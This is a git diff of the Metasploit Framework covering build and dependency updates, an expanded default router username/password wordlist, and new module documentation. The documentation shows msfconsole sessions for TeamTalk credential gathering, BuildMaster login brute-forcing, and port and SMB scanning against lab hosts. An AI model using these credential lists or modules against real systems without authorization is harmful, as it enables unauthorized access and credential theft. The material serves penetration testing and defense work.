diff --git a/.ruby-version b/.ruby-version index 005119baaa..8e8299dcc0 100644 --- a/.ruby-version +++ b/.ruby-version @@ -1 +1 @@ -2.4.1 +2.4.2 diff --git a/.travis.yml b/.travis.yml index 28f0b510f7..ffcbff526b 100644 --- a/.travis.yml +++ b/.travis.yml @@ -12,8 +12,8 @@ addons: language: ruby rvm: - '2.2' - - '2.3.4' - - '2.4.1' + - '2.3.5' + - '2.4.2' env: - CMD='bundle exec rake rspec-rerun:spec SPEC_OPTS="--tag content"' @@ -21,9 +21,15 @@ env: matrix: fast_finish: true + +jobs: + # build docker image include: - - rvm: ruby-head - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" + - env: CMD="docker-compose -f $TRAVIS_BUILD_DIR/docker-compose.yml build" DOCKER="true" + # we do not need any setup + before_install: skip + install: skip + before_script: skip before_install: - "echo 'gem: --no-ri --no-rdoc' > ~/.gemrc" - rake --version @@ -42,7 +48,8 @@ before_script: - git diff --exit-code db/schema.rb script: - echo "${CMD}" - - bash -c "${CMD}" + # we need travis_wait because the Docker build job can take longer than 10 minutes + - if [[ "${DOCKER}" == "true" ]]; then echo "Starting Docker build job"; travis_wait 40 "${CMD}"; else bash -c "${CMD}"; fi notifications: irc: "irc.freenode.org#msfnotify" diff --git a/.yardopts b/.yardopts index b58b0bda2b..75b5ea96e0 100644 --- a/.yardopts +++ b/.yardopts @@ -2,7 +2,7 @@ --exclude samples/ --exclude \.ut\.rb/ --exclude \.ts\.rb/ ---files CONTRIBUTING.md,COPYING,HACKING,LICENSE +--files CONTRIBUTING.md,COPYING,LICENSE app/**/*.rb lib/msf/**/*.rb lib/metasploit/**/*.rb diff --git a/docker/Dockerfile b/Dockerfile similarity index 86% rename from docker/Dockerfile rename to Dockerfile index 8a7d546cb9..1bf0d1c27c 100644 --- a/docker/Dockerfile +++ b/Dockerfile @@ -1,4 +1,4 @@ -FROM ruby:2.4.1-alpine +FROM ruby:2.4.2-alpine MAINTAINER Rapid7 ARG BUNDLER_ARGS="--jobs=8 --without development test coverage" @@ -36,15 +36,12 @@ RUN apk update && \ ncurses-dev \ git \ && echo "gem: --no-ri --no-rdoc" > /etc/gemrc \ + && gem update --system \ && gem install bundler \ && bundle install --system $BUNDLER_ARGS \ && apk del .ruby-builddeps \ && rm -rf /var/cache/apk/* -# fix for robots gem not readable (known bug) -# https://github.com/rapid7/metasploit-framework/issues/6068 -RUN chmod o+r /usr/local/bundle/gems/robots-*/lib/robots.rb - RUN adduser -g msfconsole -D $MSF_USER RUN /usr/sbin/setcap cap_net_raw,cap_net_bind_service=+eip $(which ruby) diff --git a/Gemfile.lock b/Gemfile.lock index 2fd974048e..89e8f367a7 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -1,7 +1,7 @@ PATH remote: . specs: - metasploit-framework (4.16.0) + metasploit-framework (4.16.9) actionpack (~> 4.2.6) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -17,9 +17,9 @@ PATH metasploit-concern metasploit-credential metasploit-model - metasploit-payloads (= 1.3.1) + metasploit-payloads (= 1.3.9) metasploit_data_models - metasploit_payloads-mettle (= 0.2.0) + metasploit_payloads-mettle (= 0.2.2) msgpack nessus_rest net-ssh @@ -58,7 +58,6 @@ PATH rex-struct2 rex-text rex-zip - robots ruby_smb rubyntlm rubyzip @@ -99,8 +98,8 @@ GEM minitest (~> 5.1) thread_safe (~> 0.3, >= 0.3.4) tzinfo (~> 1.1) - addressable (2.5.1) - public_suffix (~> 2.0, >= 2.0.2) + addressable (2.5.2) + public_suffix (>= 2.0.2, < 4.0) afm (0.2.2) arel (6.0.4) arel-helpers (2.4.0) @@ -108,11 +107,11 @@ GEM backports (3.8.0) bcrypt (3.1.11) bcrypt_pbkdf (1.0.0) - bindata (2.4.0) + bindata (2.4.1) bit-struct (0.16) builder (3.2.3) coderay (1.1.1) - daemons (1.2.4) + coderay (1.1.2) diff-lcs (1.3) dnsruby (1.60.2) docile (1.1.5) @@ -153,7 +152,7 @@ GEM activemodel (~> 4.2.6) activesupport (~> 4.2.6) railties (~> 4.2.6) - metasploit-payloads (1.3.1) + metasploit-payloads (1.3.9) metasploit_data_models (2.0.15) activerecord (~> 4.2.6) activesupport (~> 4.2.6) @@ -164,18 +163,18 @@ GEM postgres_ext railties (~> 4.2.6) recog (~> 2.0) - metasploit_payloads-mettle (0.2.0) + metasploit_payloads-mettle (0.2.2) method_source (0.8.2) - mini_portile2 (2.2.0) + mini_portile2 (2.3.0) minitest (5.10.3) msgpack (1.1.0) multipart-post (2.0.0) nessus_rest (0.1.6) - net-ssh (4.1.0) - network_interface (0.0.1) - nexpose (6.1.1) - nokogiri (1.8.0) - mini_portile2 (~> 2.2.0) + net-ssh (4.2.0) + network_interface (0.0.2) + nexpose (7.0.1) + nokogiri (1.8.1) + mini_portile2 (~> 2.3.0) octokit (4.7.0) sawyer (~> 0.8.0, >= 0.5.3) openssl-ccm (1.2.1) @@ -196,11 +195,10 @@ GEM activerecord (>= 4.0.0) arel (>= 4.0.1) pg_array_parser (~> 0.0.9) - pry (0.10.4) + pry (0.11.0) coderay (~> 1.1.0) method_source (~> 0.8.1) - slop (~> 3.4) - public_suffix (2.0.5) + public_suffix (3.0.0) rack (1.6.8) rack-protection (1.5.3) rack @@ -219,13 +217,13 @@ GEM activesupport (= 4.2.9) rake (>= 0.8.7) thor (>= 0.18.1, < 2.0) - rake (12.0.0) + rake (12.1.0) rb-readline (0.5.5) rbnacl (4.0.2) ffi rbnacl-libsodium (1.0.13) rbnacl (>= 3.0.1) - recog (2.1.11) + recog (2.1.15) nokogiri redcarpet (3.4.0) rex-arch (0.1.11) @@ -257,7 +255,7 @@ GEM rex-powershell (0.1.72) rex-random_identifier rex-text - rex-random_identifier (0.1.2) + rex-random_identifier (0.1.4) rex-text rex-registry (0.1.3) rex-rop_builder (0.1.3) @@ -275,7 +273,6 @@ GEM rex-zip (0.1.3) rex-text rkelly-remix (0.0.7) - robots (0.10.1) rspec (3.6.0) rspec-core (~> 3.6.0) rspec-expectations (~> 3.6.0) @@ -309,7 +306,7 @@ GEM sawyer (0.8.1) addressable (>= 2.3.5, < 2.6) faraday (~> 0.8, < 1.0) - simplecov (0.15.0) + simplecov (0.15.1) docile (~> 1.1.0) json (>= 1.8, < 3) simplecov-html (~> 0.10.0) diff --git a/HACKING b/HACKING deleted file mode 100644 index 17343a9f03..0000000000 --- a/HACKING +++ /dev/null @@ -1,38 +0,0 @@ -HACKING -======= - -(Last updated: 2014-03-04) - -This document almost entirely deprecated by: - -CONTRIBUTING.md - -in the same directory as this file, and to a lesser extent: - -The Metasploit Development Environment -https://github.com/rapid7/metasploit-framework/wiki/Setting-Up-a-Metasploit-Development-Environment - -Common Coding Mistakes -https://github.com/rapid7/metasploit-framework/wiki/Common-Metasploit-Module-Coding-Mistakes - -The Ruby Style Guide -https://github.com/bbatsov/ruby-style-guide - -Ruby 1.9: What to Expect -http://slideshow.rubyforge.org/ruby19.html - -You can use the the "./tools/msftidy.rb" script against your new and -changed modules to do some rudimentary checking for various style and -syntax violations. - -Licensing for Your New Content -============================== - -By submitting code contributions to the Metasploit Project it is -assumed that you are offering your code under the Metasploit License -or similar 3-clause BSD-compatible license. MIT and Ruby Licenses -are also fine. We specifically cannot include GPL code. LGPL code -is accepted on a case by case basis for libraries only and is never -accepted for modules. - - diff --git a/data/logos/r7-metasploit.txt b/data/logos/r7-metasploit.txt index bd8ef2f62c..daae920261 100644 --- a/data/logos/r7-metasploit.txt +++ b/data/logos/r7-metasploit.txt @@ -1,7 +1,7 @@ %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% -%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%%% +%% % %%%%%%%% %%%%%%%%%%% https://metasploit.com %%%%%%%%%%%%%%%%%%%%%%%% %% %% %%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %% %%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% diff --git a/data/wordlists/routers_userpass.txt b/data/wordlists/routers_userpass.txt index 4b35db7811..ba1d1a80cb 100644 --- a/data/wordlists/routers_userpass.txt +++ b/data/wordlists/routers_userpass.txt @@ -1,70 +1,100 @@ -root +ADMINISTRATOR ADMINISTRATOR +ADMN admn +Admin admin +Administrator +Administrator 3ware +Administrator admin +Administrator changeme +Administrator ganteng +Administrator letmein +Administrator password +Administrator pilou +Administrator smcadmin +Any 12345 +CSG SESAME +Cisco Cisco +D-Link D-Link +DTA TJM +GEN1 gen1 +GEN2 gen2 +GlobalAdmin GlobalAdmin +HTTP HTTP +IntraStack Asante +IntraSwitch Asante +JDE JDE +LUCENT01 UI-PSWD-01 +LUCENT02 UI-PSWD-02 +MDaemon MServer +MICRO RSX +Manager Manager +Manager friend +NAU NAU +NETWORK NETWORK +NICONEX NICONEX +PBX PBX +PFCUser 240653C9467E45 +PRODDTA PRODDTA +PSEAdmin $secure$ +PlcmSpIp PlcmSpIp +Polycom SpIp +RMUser1 password +SYSADM sysadm +Sweex Mysweex +USERID PASSW0RD +User Password +VNC winterm +VTech VTech +ZXDSL ZXDSL +acc acc +adfexc adfexc +adm admin -guest -root root -root password -root 1234 -root 12345 -root 123456 -root 3ep5w2u -root admin -root Admin -root admin_1 -root alpine -root ascend -root attack -root blender -root calvin -root changeme -root Cisco -root cms500 -root davox -root default -root fivranne -root ggdaseuaimhrke -root iDirect -root letacla -root Mau'dib -root pass -root permit -root ROOT500 -root tini -root tslinux -root wyse -ro ro -router router -rwa rwa -rw rw -ubnt ubnt -guest guest -guest User admin 0 admin 0000 admin 1111 +admin 11111111 admin 123 admin 1234 admin 123456 +admin 1234567890 admin 1234admin admin 2222 admin 22222 -admin2 changeme admin 3477 admin 3ascotel +admin 7ujMko0admin +admin 7ujMko0vizxv admin 9999 +admin Admin +admin AitbISP4eCiG +admin Ascend +admin BRIDGE +admin Intel +admin MiniAP +admin NetCache +admin NetICs +admin OCS +admin P@55w0rd! +admin PASSWORD +admin Protector +admin SMDR +admin SUPER +admin Symbol +admin TANDBERG +admin _Cisco admin access admin admin -admin Admin -Admin admin +admin admin117.35.97.74 admin admin123 +admin admin1234 +admin administrator admin adminttd admin adslolitec admin adslroot admin adtran -admin AitbISP4eCiG admin articon admin asante admin ascend -admin Ascend admin asd admin atc123 admin atlantis @@ -72,11 +102,9 @@ admin backdoor admin barricade admin barricadei admin bintec -admin BRIDGE admin cableroot admin changeme admin cisco -admin _Cisco admin comcomcom admin conexant admin default @@ -84,96 +112,79 @@ admin diamond admin enter admin epicrouter admin extendnet +admin fliradmin admin giraff admin hagpolm1 admin hello admin help admin hp.com -admin Intel admin ironport admin isee -acc acc -adfexc adfexc -adm +admin jvc admin kont2004 admin letmein admin leviton admin linga +admin meinsma +admin michaelangelo admin michelangelo admin microbusiness -admin MiniAP admin motorola admin mu admin my_DEMARC admin netadmin -admin NetCache -admin NetICs admin noway -admin OCS +admin oelinux123 admin operator -admin P@55w0rd! -admin password admin p-assword -admin PASSWORD +admin pass +admin password admin passwort admin pento admin pfsense admin private -admin Protector admin public admin pwp admin radius admin rmnetlm admin root admin secure +admin service admin setup admin sitecom admin smallbusiness admin smcadmin -admin SMDR admin speedxess -admin SUPER admin superuser +admin support admin switch -admin Symbol admin synnet admin sysAdmin admin system -admin TANDBERG +admin tech +admin ubnt admin visual admin w2402 -admin xad$|#12 +admin wbox admin xad$l#12 +admin xad$|#12 admin zoomadsl -system change_on_install -system/manager sys/change_on_install -system password -system sys +admin2 changeme +administrator administrator +administrator changeme +adminstat OCS +adminstrator changeme adminttd adminttd adminuser OCS adminview OCS -adminstat OCS -adminstrator changeme -Administrator 3ware -Administrator admin -administrator administrator -ADMINISTRATOR ADMINISTRATOR -administrator changeme -Administrator changeme -Administrator ganteng -Administrator letmein -Administrator password -Administrator pilou -Administrator smcadmin -ADMN admn +alpine alpine ami -anonymous any@ anonymous Exabyte -Any 12345 +anonymous any@ apc apc at4400 at4400 -bbsd-client changeme2 bbsd-client NULL +bbsd-client changeme2 bciim bciimpw bcim bcimpw bcms bcmspw @@ -191,7 +202,6 @@ cellit cellit cgadmin cgadmin cisco cisco cisco -Cisco Cisco citel citel client client cmaker cmaker @@ -201,15 +211,19 @@ craft craft craft craft craftpw craft crftpw -CSG SESAME cusadmin highspeed cust custpw customer customer none dadmin dadmin01 +daemon davox davox debug d.e.b.u.g debug synnet +default +default antslq +default default +default password deskalt password deskman changeme desknorm password @@ -220,41 +234,39 @@ dhs3pms dhs3pms diag danger diag switch disttech 4tas -D-Link D-Link draytek 1234 -DTA TJM e250 e250changeme e500 e500changeme -echo echo echo User +echo echo enable eng engineer enquiry enquirypw field support -GEN1 gen1 -GEN2 gen2 -GlobalAdmin GlobalAdmin +guest +guest 1111 +guest 12345 +guest 123456 +guest User +guest guest +guest xc3511 halt tlah helpdesk OCS hsa hsadb hscroot abc123 -HTTP HTTP hydrasna iclock timely images images inads inads inads indspw init initpw -installer installer install llatsni install secret +installer installer intel intel intermec intermec intermec intermec1QTPS -IntraStack Asante -IntraSwitch Asante jagadmin -JDE JDE kermit kermit l2 l2 l3 l3 @@ -266,8 +278,6 @@ login access login admin login password lp lp -LUCENT01 UI-PSWD-01 -LUCENT02 UI-PSWD-02 m1122 m1122 mac maint maint @@ -278,50 +288,41 @@ manage !manage manager admin manager change_on_install manager friend -Manager friend manager manager -Manager Manager manager sys manuf xxyyzz -MDaemon MServer mediator mediator -MICRO RSX +mg3500 merlin mlusr mlusr monitor monitor +mother fucker mtch mtch mtcl mtcl mtcl naadmin naadmin -NAU NAU netangr attack netman netman netman netopia netopia netrangr attack netscreen netscreen -NETWORK NETWORK -NICONEX NICONEX nms nmspw nokai nokai nokia nokia none 0 none admin -operator -operator 1234 -operator $chwarzepumpe -operator operator op op op operator +operator +operator $chwarzepumpe +operator 1234 +operator operator +oracle oracle patrol patrol -PBX PBX -PFCUser 240653C9467E45 piranha piranha piranha q pmd poll tech -Polycom SpIp -PRODDTA PRODDTA -PSEAdmin $secure$ public public public radware radware @@ -331,7 +332,89 @@ readonly lucenttech2 readwrite lucenttech1 recovery recovery replicator replicator -RMUser1 password +ro ro +root +root 000000 +root 1111 +root 1234 +root 12345 +root 123456 +root 1234567890 +root 1234qwer +root 123qwe +root 1q2w3e4r5 +root 3ep5w2u +root 54321 +root 666666 +root 7ujMko0admin +root 7ujMko0vizxv +root 888888 +root Admin +root Cisco +root GMB182 +root LSiuY7pOmZG2s +root Mau'dib +root PASSWORD +root ROOT500 +root Serv4EMC +root Zte521 +root abc123 +root admin +root admin1234 +root admin_1 +root ahetzip8 +root alpine +root anko +root antslq +root ascend +root attack +root avtech +root b120root +root bananapi +root blender +root calvin +root changeme +root cms500 +root comcom +root coolphoenix579 +root davox +root default +root dreambox +root fivranne +root ggdaseuaimhrke +root hi3518 +root iDirect +root ikwb +root ikwd +root jauntech +root juantech +root jvbzd +root klv123 +root klv1234 +root letacla +root maxided +root oelinux123 +root openssh +root openvpnas +root orion99 +root pa55w0rd +root pass +root password +root permit +root realtek +root root +root tini +root tslinux +root user +root vizxv +root wyse +root xc3511 +root xmhdipc +root zlxx. +root zte9x15 +router router +rw rw +rwa rwa sa scmadmin scmchangeme scout scout @@ -346,44 +429,55 @@ smc smcadmin spcl 0 storwatch specialist stratacom stratauser +su super super 5777364 +super super +super surt +super.super +super.super master superadmin secret superman 21241036 superman talent -super super -super.super -super.super master -super surt superuser superuser 123456 superuser admin supervisor PlsChgMe! supervisor PlsChgMe1 supervisor supervisor +supervisor zyad1234 +support 123 +support 1234 +support 12345 +support 123456 +support admin support h179350 +support login support support support supportpw -su super -Sweex Mysweex +support zlxx. +sys uplink sysadm Admin +sysadm PASS sysadm anicust +sysadm sysadm sysadmin PASS sysadmin password sysadmin sysadmin -sysadm PASS -sysadm sysadm -SYSADM sysadm -sys uplink +system change_on_install +system password +system sys +system/manager sys/change_on_install target password teacher password tech tech ANYCOM -tech field tech ILMI +tech field tech tech telco telco telecom telecom tellabs tellabs#1 +telnet telnet temp1 password test test tiara tiaranet @@ -391,19 +485,17 @@ tiger tiger123 topicalt password topicnorm password topicres password +ubnt ubnt user -USERID PASSW0RD +user 123456 user pass user password -User Password user public user tivonpw user user vcr NetVCR -VNC winterm volition volition vt100 public -VTech VTech webadmin 1234 webadmin webadmin websecadm changeme @@ -412,4 +504,3 @@ wradmin trancell write private xd xd xxx cascade -ZXDSL ZXDSL diff --git a/docker-compose.yml b/docker-compose.yml index e966e8dcac..0f433b31fe 100644 --- a/docker-compose.yml +++ b/docker-compose.yml @@ -4,7 +4,7 @@ services: image: metasploit build: context: . - dockerfile: ./docker/Dockerfile + dockerfile: ./Dockerfile environment: DATABASE_URL: postgres://postgres@db:5432/msf links: diff --git a/documentation/modules/auxiliary/gather/teamtalk_creds.md b/documentation/modules/auxiliary/gather/teamtalk_creds.md new file mode 100644 index 0000000000..9229e4d649 --- /dev/null +++ b/documentation/modules/auxiliary/gather/teamtalk_creds.md @@ -0,0 +1,53 @@ +## Description + + This module retrieves user credentials from BearWare TeamTalk. + + Valid administrator credentials are required. + + Starting from version 5, TeamTalk allows users to login using a username and password combination. The username and password are stored on the server in clear text and can be retrieved remotely by any user with administrator privileges. + + +## Vulnerable Application + + [TeamTalk 5](http://www.bearware.dk/) is a freeware conferencing system which allows multiple users to participate in audio and video conversations. The TeamTalk install file includes both client and server application. A special client application is included with accessibility features for visually impaired. + + This module has been tested successfully on TeamTalk versions 5.2.2.4885 and 5.2.3.4893. + + The TeamTalk software is available on the [BearWare website](http://www.bearware.dk/) and on [GitHub](https://github.com/BearWare/TeamTalk5). + + +## Verification Steps + + 1. Start `msfconsole` + 2. Do: `use auxiliary/gather/teamtalk_creds` + 3. Do: `set rhost ` + 4. Do: `set rport ` (default: `10333`) + 5. Do: `set username ` (default: `admin`) + 6. Do: `set password ` (default: `admin`) + 7. Do: `run` + 8. You should get credentials + + +## Scenarios + + ``` + [*] 172.16.191.166:10333 - Found TeamTalk (protocol version 5.2) + [+] 172.16.191.166:10333 - Authenticated successfully + [+] 172.16.191.166:10333 - User is an administrator + [*] 172.16.191.166:10333 - Found 5 users + + TeamTalk User Credentials + ========================= + + Username Password Type + -------- -------- ---- + debbie 1234567890 1 + murphy 934txs 2 + quinn ~!@#$%^&*()_+{}|:" <>?;',./ 2 + sparks password 2 + stormy 1 + + [+] 172.16.191.166:10333 - Credentials saved in: /root/.msf4/loot/20170724092809_default_172.16.191.166_teamtalk.user.cr_034806.txt + [*] Auxiliary module execution completed + ``` + diff --git a/documentation/modules/auxiliary/scanner/http/buildmaster_login.md b/documentation/modules/auxiliary/scanner/http/buildmaster_login.md new file mode 100644 index 0000000000..0402f34ef0 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/http/buildmaster_login.md @@ -0,0 +1,59 @@ +## Description + +This module allows you to authenticate to Inedo BuildMaster, an application release automation tool. +The default credentials for BuildMaster are Admin/Admin. Gaining privileged access to BuildMaster can lead to remote code execution. + +## Vulnerable Application + +[Inedo's Windows installation guide](http://inedo.com/support/documentation/buildmaster/installation/windows-guide) + +[Inedo website](http://inedo.com/) + +## Verification Steps + +1. Do: ```use auxiliary/scanner/http/buildmaster_login``` +2. Do: ```set RHOSTS [IP]``` +3. Do: ```set RPORT [PORT]``` +4. Do: Set credentials +5. Do: ```run``` +6. You should see the module attempting to log in. + +## Scenarios + +### Attempt to login with the default credentials. + +``` +msf > use auxiliary/scanner/http/buildmaster_login +msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39 +RHOSTS => 10.0.0.39 +msf auxiliary(buildmaster_login) > run + +[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1) +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin" +[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin" +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(buildmaster_login) > +``` + +### Brute force with credentials from file. + +``` +msf > use auxiliary/scanner/http/buildmaster_login +msf auxiliary(buildmaster_login) > set RHOSTS 10.0.0.39 +RHOSTS => 10.0.0.39 +msf auxiliary(buildmaster_login) > set USERPASS_FILE ~/BuildMasterCreds.txt +USERPASS_FILE => ~/BuildMasterCreds.txt +msf auxiliary(buildmaster_login) > run + +[+] 10.0.0.39:81 - Identified BuildMaster 5.7.3 (Build 1) +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"test" +[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"test" +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"wrong" +[-] FAILED LOGIN - 10.0.0.39:81 - "Admin":"wrong" +[*] 10.0.0.39:81 - Trying username:"Admin" with password:"Admin" +[+] SUCCESSFUL LOGIN - 10.0.0.39:81 - "Admin":"Admin" +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +msf auxiliary(buildmaster_login) > +``` diff --git a/documentation/modules/auxiliary/scanner/http/cisco_firepower_login.md b/documentation/modules/auxiliary/scanner/http/cisco_firepower_login.md index 1a0a10b5f6..7a56164b27 100644 --- a/documentation/modules/auxiliary/scanner/http/cisco_firepower_login.md +++ b/documentation/modules/auxiliary/scanner/http/cisco_firepower_login.md @@ -17,7 +17,7 @@ https://software.cisco.com/download/release.html?mdfid=286259687&softwareid=2862 1. Make sure Cisco Firepower Management console's HTTPS service is running 2. Start ```msfconsole``` -3. ```use auxiliary/scanner/http/cisco_firepower_login.rb +3. ```use auxiliary/scanner/http/cisco_firepower_login.rb``` 4. ```set RHOSTS [IP]``` 5. Set credentials 6. ```run``` diff --git a/documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md b/documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md new file mode 100644 index 0000000000..ab67460db7 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/misc/cisco_smart_install.md @@ -0,0 +1,30 @@ +## Vulnerable Application + + Any system exposing the Cisco Smart Install (SMI) protocol, which typically runs on TCP port 4786. + +## Verification Steps + + 1. Do: ```use auxiliary/scanner/misc/cisco_smart_install``` + 2. Do: ```set [RHOSTS]```, replacing ```[RHOSTS]``` with a list of hosts to test for the presence of SMI + 3. Do: ```run``` + 4. If the host is exposing an identifiable SMI instance, it will print the endpoint. + + +## Scenarios + + ``` +msf auxiliary(cisco_smart_install) > run + +[*] Scanned 57 of 512 hosts (11% complete) +[*] Scanned 105 of 512 hosts (20% complete) +[*] Scanned 157 of 512 hosts (30% complete) +[*] Scanned 212 of 512 hosts (41% complete) +[*] Scanned 256 of 512 hosts (50% complete) +[*] Scanned 310 of 512 hosts (60% complete) +[*] Scanned 368 of 512 hosts (71% complete) +[*] Scanned 413 of 512 hosts (80% complete) +[*] Scanned 466 of 512 hosts (91% complete) +[+] a.b.c.d:4786 - Fingerprinted the Cisco Smart Install protocol +[*] Scanned 512 of 512 hosts (100% complete) +[*] Auxiliary module execution completed +``` diff --git a/documentation/modules/auxiliary/scanner/portscan/syn.md b/documentation/modules/auxiliary/scanner/portscan/syn.md new file mode 100644 index 0000000000..751590b95f --- /dev/null +++ b/documentation/modules/auxiliary/scanner/portscan/syn.md @@ -0,0 +1,59 @@ +## Description + +This module will attempt to initiate a TCP/IP connection with ports on the victim machine. It is this done by sending a SYN packet, and if victim replies with a SYN/ACK packet +that means the port is open. Then the attacker sends a RST packet, and as a result the victim's machine assumes that there is a communication error. +The attacker now knows the state of port without a full tcp connection. Major benefit of TCP SYN scan is that most logging applications do not log the TCP/RST by default. + +## Options + + **PORTS** + + This is the list of TCP ports to test on each host. + Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default + options is to scan `1-10000` ports. + + **TIMEOUT** + + Maximum time to wait for a response. The default value is 500 milliseconds. + + **VERBOSE** + + Gives detailed message about the scan of all the ports. It also shows the + ports that were closed. + +## Verification Steps + + 1. Do: `use auxiliary/scanner/portscan/syn` + 2. Do: `set RHOSTS [IP]` + 3. Do: `set PORTS [PORTS]` + 4. Do: `run` + 5. If any of the TCP ports were open they will be discovered, status will be printed indicating as such. + +## Scenarios + +### Metaspliotable 2 + +``` +msf > use auxiliary/scanner/portscan/syn +msf auxiliary(syn) > set RHOSTS 192.168.45.159 +RHOSTS => 192.168.45.159 +msf auxiliary(syn) > set PORTS 1-10000 +PORTS => 1-10000 +msf auxiliary(syn) > run +[*] TCP OPEN 192.168.45.159:22 +[*] TCP OPEN 192.168.45.159:23 +[*] TCP OPEN 192.168.45.159:111 +[*] TCP OPEN 192.168.45.159:445 +[*] TCP OPEN 192.168.45.159:512 +[*] TCP OPEN 192.168.45.159:513 +[*] TCP OPEN 192.168.45.159:1099 +[*] TCP OPEN 192.168.45.159:2121 +[*] TCP OPEN 192.168.45.159:3306 +[*] TCP OPEN 192.168.45.159:3632 +[*] TCP OPEN 192.168.45.159:6000 +[*] TCP OPEN 192.168.45.159:6697 +[*] TCP OPEN 192.168.45.159:8009 +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed + +``` diff --git a/documentation/modules/auxiliary/scanner/portscan/tcp.md b/documentation/modules/auxiliary/scanner/portscan/tcp.md new file mode 100644 index 0000000000..61eea3ec25 --- /dev/null +++ b/documentation/modules/auxiliary/scanner/portscan/tcp.md @@ -0,0 +1,71 @@ +## Description + + This module will enumerate open TCP services by performing a full TCP connect on each port. This will establish a complete three-way handshake (SYN -> SYN/ACK -> ACK) on the target port. This does not need administrative privileges on the source machine, which may be useful if pivoting. + +## Vulnerable Application + + Any reachable TCP endpoint is a potential target. + +## Options + + **PORTS** + + This is the list of ports to test for TCP Scan on each host. + Formats like `1-3`, `1,2,3`, `1,2-3`, etc. are all supported. Default + options is to scan `1-10000` ports. + + **ConnectTimeout** + + This options states the maximum number of seconds to establish a tcp + connection. Default value if `10`. + + **VERBOSE** + + Gives detailed message about the scan of all the ports. It also shows the + ports that were closed. + +## Verification Steps + + 1. Do: ```use auxiliary/scanner/portscan/tcp``` + 2. Do: ```set RHOSTS [IP]``` + 3. Do: ```set PORTS [PORTS]``` + 4. Do: ```run``` + +## Scenarios + +### Metaspliotable 2 + +``` +msf > use auxiliary/scanner/portscan/tcp +msf auxiliary(tcp) > set RHOSTS 192.168.45.159 +msf auxiliary(tcp) > set PORTS 1-10000 +msf auxiliary(tcp) > run +[*] 192.168.45.159: - 192.168.45.159:25 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:21 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:23 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:22 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:53 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:80 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:111 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:139 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:445 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:513 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:514 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:512 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:1099 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:1524 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:2049 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:2121 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:3306 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:3632 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:5432 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:5900 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:6000 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:6667 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:6697 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:8009 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:8180 - TCP OPEN +[*] 192.168.45.159: - 192.168.45.159:8787 - TCP OPEN +[*] Scanned 1 of 1 hosts (100% complete) +[*] Auxiliary module execution completed +``` diff --git a/documentation/modules/auxiliary/scanner/smb/smb1.md b/documentation/modules/auxiliary/scanner/smb/smb1.md new file mode 100644 index 0000000000..17c30c3a8a --- /dev/null +++ b/documentation/modules/auxiliary/scanner/smb/smb1.md @@ -0,0 +1,55 @@ +# Description +This module scans for hosts that support the SMBv1 protocol. It works by sending an SMB_COM_NEGOTATE request to each host specified in RHOSTS and claims that it only supports the following SMB dialects: +```PC NETWORK PROGRAM 1.0 +LANMAN1.0 +Windows for Workgroups 3.1a +LM1.2X002 +LANMAN2.1 +NT LM 0.12 +``` +If the SMB server has SMBv1 enabled it will respond to the request with a dialect selected. +If the SMB server does not support SMBv1 a RST will be sent. + +___ +# Usage + +The following is an example of its usage, where x.x.x.x allows SMBv1 and y.y.y.y does not. + +#### A host that does support SMBv1. + +``` +msf auxiliary(smb1) > use auxiliary/scanner/smb/smb1 +msf 